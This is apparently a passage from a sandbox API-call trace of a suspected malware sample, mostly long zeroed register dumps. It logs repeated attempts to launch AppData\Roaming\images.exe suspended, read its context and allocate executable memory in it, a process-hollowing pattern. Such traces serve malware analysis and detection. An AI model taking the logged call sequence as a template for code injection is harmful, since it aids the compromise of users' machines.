bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x52ded0*=0xb240) returned 1 [0195.107] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x52dec8*=0xb240, lpdwindex=0x52dce4 | out: lpdwindex=0x52dce4) returned 0x0 [0195.369] CloseHandle (hObject=0xb240) returned 1 [0195.369] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp", nBufferLength=0x105, lpBuffer=0x52da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp", lpFilePart=0x0) returned 0x3c [0195.370] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmp40f5.tmp")) returned 1 [0195.380] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", nBufferLength=0x105, lpBuffer=0x52d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpFilePart=0x0) returned 0x38 [0195.424] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x52dc10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x52df0c | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x52df0c*(hProcess=0xad8c, hThread=0xb240, dwProcessId=0x348, dwThreadId=0x13c)) returned 1 [0195.433] GetThreadContext (in: hThread=0xb240, lpContext=0x24b2eb0 | out: lpContext=0x24b2eb0*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x19770e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0195.440] ReadProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x7efde008, lpBuffer=0x52def4, nSize=0x4, lpNumberOfBytesRead=0x52df44 | out: lpBuffer=0x52def4*, lpNumberOfBytesRead=0x52df44*=0x4) returned 1 [0195.442] VirtualAllocEx (hProcess=0xad8c, lpAddress=0x400000, dwSize=0x153000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0195.443] EnumProcesses (in: lpidProcess=0x24b321c, cb=0x400, lpcbNeeded=0x52dbe8 | out: lpidProcess=0x24b321c, lpcbNeeded=0x52dbe8) returned 1 [0195.444] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x348) returned 0xcbc0 [0195.562] TerminateProcess (hProcess=0xcbc0, uExitCode=0xffffffff) returned 1 [0195.562] CloseHandle (hObject=0xcbc0) returned 1 [0195.563] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x52dc10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x52df0c | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x52df0c*(hProcess=0x4580, hThread=0xcbc0, dwProcessId=0x30c, dwThreadId=0x7a8)) returned 1 [0195.566] GetThreadContext (in: hThread=0xcbc0, lpContext=0x24b3810 | out: lpContext=0x24b3810*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x19770e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0195.573] ReadProcessMemory (in: hProcess=0x4580, lpBaseAddress=0x7efde008, lpBuffer=0x52def4, nSize=0x4, lpNumberOfBytesRead=0x52df44 | out: lpBuffer=0x52def4*, lpNumberOfBytesRead=0x52df44*=0x4) returned 1 [0195.573] VirtualAllocEx (hProcess=0x4580, lpAddress=0x400000, dwSize=0x153000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0195.574] EnumProcesses (in: lpidProcess=0x24b3b7c, cb=0x400, lpcbNeeded=0x52dbe8 | out: lpidProcess=0x24b3b7c, lpcbNeeded=0x52dbe8) returned 1 [0195.574] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x30c) returned 0xc01c [0195.574] TerminateProcess (hProcess=0xc01c, uExitCode=0xffffffff) returned 1 [0195.575] CloseHandle (hObject=0xc01c) returned 1 [0195.575] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x52dc10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x52df0c | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x52df0c*(hProcess=0x131c0, hThread=0xc01c, dwProcessId=0x63c, dwThreadId=0x68c)) returned 1 [0195.578] GetThreadContext (in: hThread=0xc01c, lpContext=0x24b4170 | out: lpContext=0x24b4170*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x19770e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, 